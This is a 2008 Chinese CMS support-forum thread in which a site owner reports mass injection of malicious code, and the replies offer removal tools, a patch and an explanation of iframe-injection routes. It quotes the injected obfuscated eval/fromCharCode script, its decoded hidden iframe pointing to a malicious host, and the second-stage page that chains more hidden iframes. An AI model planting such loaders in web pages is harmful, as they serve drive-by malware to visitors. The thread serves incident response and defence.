账号通
    

账号  

密码  

3010

查看

9

回复
主题:[求助]网站被植入了恶意代码 寻求帮助 [收藏主题] 转到:  
thomas 当前离线

65

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:876 分
登录次数:18 次
注册时间:2007/11/19
最后登录:2008/5/16
thomas 发表于:2008/1/10 15:15:00   | 只看该作者 查看该作者主题 楼主 
做在线知识付费 选科汛云开店

网站被植入了以下代码

<script>t='60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,102,114,101,101,46,117,45,117,117,117,46,99,110,47,101,114,114,111,114,46,104,116,109,32,119,105,100,116,104,61,49,48,48,32,104,101,105,103,104,116,61,48,62,60,47,105,102,114,97,109,101,62';t=eval('String.fromCharCode('+t+')');alert(t);</script>

也就是

<iframe src=http://free.u-uuu.cn/error.htm width=100 height=0></iframe>

服务器上所有网站都被植入了同样的代码 郁闷死了

哪位高人帮忙下啊 也不知道是哪个网站有漏洞被黑客利用了还是服务器自身漏洞

有几个站点是用4.0做的 4.0有漏洞吗

 
  支持(1) | 反对(0) 回到顶部顶端 回到底部底部
gyxin123 当前离线

1204

主题

0

广播

0

粉丝
添加关注
级别:九年级

用户积分:9198 分
登录次数:441 次
注册时间:2007/12/23
最后登录:2012/10/16
gyxin123 发表于:2008/1/10 18:02:00   | 只看该作者 查看该作者主题 沙发 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
任我行 当前离线

6496

主题

191

广播

251

粉丝
添加关注
级别:管理员

用户积分:46050 分
登录次数:4182 次
注册时间:2006/4/26
最后登录:2024/11/21
任我行 发表于:2008/1/10 18:00:00   | 只看该作者 查看该作者主题 藤椅 

亲爱的用户!

   最近发现部分用户出现了自己的站点被插入iframe代码.为了减少用户清除此iframe木马的困难.特对商业用户提供iframe批量替换工具.具体使用方法请参看压缩包的说明.



下载信息
图片点击可在新窗口打开查看[点击浏览该文件:iframe批量替换工具.rar] | 图片点击可在新窗口打开查看[快车下载]

附:网站网页被嵌入iframe的原因(转自网上)

<script type="text/javascript"></script><script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>

一、问题提出
    这个应该是ARP欺骗吧,我单位机子中过,每打开一个网页上面都被iframe。
    前段时间,浏览我们公司一台服务器上的所有网站,前面都被加上<iframe ....></iframe>,刷新的时候有时候又没有了
   新建测试站点也有相同现象发生
   在同一时间不同地点的客户端浏览有相同现象发生,在服务器上浏览没有这个问题
检查服务器上代码没有发现被修改的痕迹,IIS设置也没有发现加上isapi的痕迹
后来也没有做什么更改,一切又正常了
不知道这到底会是什么问题?不知道在路由器上有无产生这种现象的设置?
显然,大多数这样的情况是非网站主所为,而是大多被利用来挂马或加载恶意广告所造成,那么有多少途径可以导致网页被插入iframe呢?也就是说有用户浏览你的网站会出现被插入iframe的代码。

二、在网页中插入iframe的可能途径
虽然问题简单,但详细说起来从服务器、传输过程和客户端3个层次来分析。
1、就服务器而言存在的可能:
(1) 直接修改网页插入,现象是网页被改动了。
(2) 通过ISAPI Filter插入,现象是出现了陌生的ISAPI加载项。
(3) 通过IIS的脚注插入,现象是脚注设置被启用了。
(4) 通过网络TDI或NDIS插入,现象是出现了不知名的网络驱动类程序。
2、就传输过程存在的可能:
(1) 路由器被劫持,现象是只要通过某个路由器访问则出现代码,否则就没有。
(2) ARP欺骗,现象是arp表显然不正确。
3、就客户端存在的可能:
(1) 恶意程序或恶意插件,现象是其他机器访问网站就没有被插入代码。

三、问题的解决:
可以先从服务器检查入手,发现可能存在的问题,若排除后则可判定是传输过程中被劫持,若仅仅是个人用户则可能是用户机器中毒造成的,现在好象ARP欺骗也会如此。

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
任我行 当前离线

6496

主题

191

广播

251

粉丝
添加关注
级别:管理员

用户积分:46050 分
登录次数:4182 次
注册时间:2006/4/26
最后登录:2024/11/21
任我行 发表于:2008/1/10 18:00:00   | 只看该作者 查看该作者主题 板凳 
科汛在线商城系统(NET)
以下是引用thomas在2008-1-10 15:15:14的发言:
0

网站被植入了以下代码

<script>t='60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,102,114,101,101,46,117,45,117,117,117,46,99,110,47,101,114,114,111,114,46,104,116,109,32,119,105,100,116,104,61,49,48,48,32,104,101,105,103,104,116,61,48,62,60,47,105,102,114,97,109,101,62';t=eval('String.fromCharCode('+t+')');alert(t);</script>

也就是

<iframe src=http://free.u-uuu.cn/error.htm width=100 height=0></iframe>

服务器上所有网站都被植入了同样的代码 郁闷死了

哪位高人帮忙下啊 也不知道是哪个网站有漏洞被黑客利用了还是服务器自身漏洞

有几个站点是用4.0做的 4.0有漏洞吗

[符合XHTML规范,内容为纯文本或UBB(UBB解释文件版本:2006-5-23)]

这个补丁还没打的话请尽快打上这个补丁

http://bbs.kesion.com/dispbbs.asp?boardID=41&ID=40387&page=1
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
thomas 当前离线

65

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:876 分
登录次数:18 次
注册时间:2007/11/19
最后登录:2008/5/16
thomas 发表于:2008/1/10 16:47:00   | 只看该作者 查看该作者主题 报纸 
科汛在线商城系统(NET)
怎么反批量处理啊
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
xxyyzz 当前离线

461

主题

0

广播

0

粉丝
添加关注
级别:四年级

用户积分:3165 分
登录次数:147 次
注册时间:2007/1/25
最后登录:2010/2/21
xxyyzz 发表于:2008/1/10 16:09:00   | 只看该作者 查看该作者主题 地板 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
surviv0r 当前离线

72

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:1075 分
登录次数:126 次
注册时间:2006/8/16
最后登录:2009/12/31
surviv0r 发表于:2008/1/10 16:04:00   | 只看该作者 查看该作者主题 7楼 
做在线知识付费 选科汛云开店

其实很简单,把所有模板和文章重新生成一遍就好了,当然你要保证模板是没问题的~

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
dja168 当前离线

362

主题

5

广播

1

粉丝
添加关注
级别:三年级

用户积分:4410 分
登录次数:638 次
注册时间:2006/7/20
最后登录:2023/8/8
dja168 发表于:2008/1/10 15:49:00   | 只看该作者 查看该作者主题 8楼 

他是给网站批量挂马了,可以反批量处理,需要帮忙联系我 ,daijianan800@hotmail.com

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
thomas 当前离线

65

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:876 分
登录次数:18 次
注册时间:2007/11/19
最后登录:2008/5/16
thomas 发表于:2008/1/10 15:20:00   | 只看该作者 查看该作者主题 9楼 
科汛智能建站系统

再打开网页 源代码还是流量统计加框架

www.uhbaidu.com 这个站长太缺德了

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
thomas 当前离线

65

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:876 分
登录次数:18 次
注册时间:2007/11/19
最后登录:2008/5/16
thomas 发表于:2008/1/10 15:18:00   | 只看该作者 查看该作者主题 10楼 
做在线知识付费 选科汛云开店

打开网页http://free.u-uuu.cn/error.htm

内容是

<script src=vip.gif></script>
<iframe src=http://www.uhbaidu.com/photo/3g.htm width=100 height=0></iframe>
<script language="javascript" src="http://count32.51yes.com/click.aspx?id=329666995&logo=12"></script>

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.66016秒 powered by KesionCMS 9.0